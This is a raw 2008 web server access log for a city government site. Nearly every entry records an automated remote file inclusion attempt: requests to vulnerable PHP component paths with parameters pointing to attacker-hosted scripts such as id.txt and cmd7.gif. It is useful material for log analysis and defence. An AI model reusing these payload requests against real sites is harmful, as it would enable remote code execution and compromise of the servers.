219.142.121.41 - - [01/Sep/2008:02:40:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:02:40:46 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:41:10 -0700] "GET /logs/access_080201.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:41:10 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:41:10 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:02:41:36 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:02:41:38 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.31.236.242 - - [01/Sep/2008:02:41:41 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:42:15 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:43:44 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:43:44 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:43:44 -0700] "GET //config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.13.230.130 - - [01/Sep/2008:02:43:48 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://www.codeduc.cl/components/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:44:12 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:45:00 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:45:00 -0700] "GET //config/dbutil.bck.php?confdir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:45:00 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:02:45:17 -0700] "GET /logs/access_080330.log/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:02:45:18 -0700] "GET /logs/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:45:20 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:02:47:11 -0700] "GET /logs/access_080201.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:49:22 -0700] "GET /logs/access_080329.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:49:23 -0700] "GET /logs/access_080330.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:50:47 -0700] "GET /logs/access_080329.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
81.9.63.18 - - [01/Sep/2008:02:50:47 -0700] "GET /logs/access_080330.log%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:52:25 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:52:25 -0700] "GET //config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:52:25 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:52:25 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:52:25 -0700] "GET //config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:52:25 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:02:52:46 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:53:05 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:02:53:05 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:10 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:10 -0700] "GET //config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:11 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:44 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:45 -0700] "GET //config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:45 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:48 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:48 -0700] "GET //config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:55:48 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:56:22 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:56:35 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
216.246.28.43 - - [01/Sep/2008:02:56:44 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:02:58:03 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
62.140.23.20 - - [01/Sep/2008:02:58:03 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "cityofarkadelphia.com"
88.84.157.43 - - [01/Sep/2008:02:58:14 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.84.157.43 - - [01/Sep/2008:02:58:14 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
88.84.157.43 - - [01/Sep/2008:02:58:15 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
221.141.2.177 - - [01/Sep/2008:02:59:08 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.hs-prutz.tsn.at/copper/include/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
221.141.2.177 - - [01/Sep/2008:02:59:08 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.hs-prutz.tsn.at/copper/include/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
221.141.2.177 - - [01/Sep/2008:02:59:08 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://www.hs-prutz.tsn.at/copper/include/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.101.4.49 - - [01/Sep/2008:03:00:14 -0700] "GET /logs/access_080201.log//admin/editor2/errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.101.4.49 - - [01/Sep/2008:03:00:14 -0700] "GET //admin/editor2/errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
87.101.4.49 - - [01/Sep/2008:03:00:14 -0700] "GET /logs//admin/editor2/errors.php?error=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
221.141.2.177 - - [01/Sep/2008:03:03:16 -0700] "GET /logs/access_080330.log%20//templates/mangobery/footer.sample.php?Site_Path=http://www.hs-prutz.tsn.at/copper/include/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:03:04:53 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:03:04:53 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:03:04:53 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:05:30 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:05:30 -0700] "GET //?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:05:30 -0700] "GET /logs//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:05:52 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:05:53 -0700] "GET //?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:05:53 -0700] "GET /logs//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:06:17 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:06:44 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:08:05 -0700] "GET //?path%5Bdocroot%5D=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 200 917 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:08:05 -0700] "GET /logs//?path%5Bdocroot%5D=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 200 4089 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:08:09 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:03:08:14 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:08:30 -0700] "GET /logs/access_080330.log/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:08:31 -0700] "GET /errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:08:31 -0700] "GET /logs/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:08:35 -0700] "GET /logs/access_080330.log/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:08:35 -0700] "GET /errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:08:35 -0700] "GET /logs/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:09:28 -0700] "GET /logs/access_080330.log//?path%5Bdocroot%5D=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:09:29 -0700] "GET /logs/access_071201.log//?path%5Bdocroot%5D=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
219.142.121.41 - - [01/Sep/2008:03:10:03 -0700] "GET /logs/access_080330.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.ahrens-kind.de/cms/css/deal.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:10:53 -0700] "GET /logs/access.log//include/write.php?dir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:10:53 -0700] "GET //include/write.php?dir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:10:53 -0700] "GET /logs//include/write.php?dir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:11:04 -0700] "GET /logs/access_080330.log/errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:11:07 -0700] "GET /errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:11:08 -0700] "GET /logs/errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:11:10 -0700] "GET /logs/access.log//include/write.php?dir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:11:10 -0700] "GET //include/write.php?dir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:11:10 -0700] "GET /logs//include/write.php?dir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
204.15.10.22 - - [01/Sep/2008:03:11:36 -0700] "GET /logs//components/errors.php?error=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "cityofarkadelphia.com"
204.15.10.22 - - [01/Sep/2008:03:11:36 -0700] "GET //components/errors.php?error=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:11:41 -0700] "GET /logs/access_071231.log/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:11:42 -0700] "GET /logs/access_071231.log/errors.php?error=http://didik.wapath.com/scripts/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
193.178.228.12 - - [01/Sep/2008:03:12:29 -0700] "GET /logs//components/errors.php?error=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
193.178.228.12 - - [01/Sep/2008:03:12:29 -0700] "GET //components/errors.php?error=http://www.gymanet.com/rid???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:13:26 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:13:27 -0700] "GET //components/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:13:27 -0700] "GET /logs//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
66.103.152.151 - - [01/Sep/2008:03:14:06 -0700] "GET /logs/access_071231.log/errors.php?error=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "cityofarkadelphia.com"
77.79.246.241 - - [01/Sep/2008:03:14:22 -0700] "GET /logs//atom.php5?page=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
77.79.246.241 - - [01/Sep/2008:03:14:22 -0700] "GET //atom.php5?page=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:14:24 -0700] "GET /logs/access_080201.log//?path%5Bdocroot%5D=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:15:20 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:15:20 -0700] "GET //components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
209.250.238.63 - - [01/Sep/2008:03:15:20 -0700] "GET /logs//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "cityofarkadelphia.com"
203.130.198.38 - - [01/Sep/2008:03:15:27 -0700] "GET /logs/access_080101.log//?path%5Bdocroot%5D=http://s9.uploads.bizhat.com/dl/7a8731c00353363176cb4cf86a83e278/48bbbd4d/944edfb2/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:15:37 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:15:37 -0700] "GET //components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.128.80.13 - - [01/Sep/2008:03:15:37 -0700] "GET /logs//components/errors.php?error=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:16:31 -0700] "GET /logs/access_080201.log//components/errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:16:31 -0700] "GET //components/errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
201.130.79.38 - - [01/Sep/2008:03:16:31 -0700] "GET /logs//components/errors.php?error=http://tdhma.org/modules/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:03:16:35 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:03:16:35 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
72.9.233.10 - - [01/Sep/2008:03:16:36 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
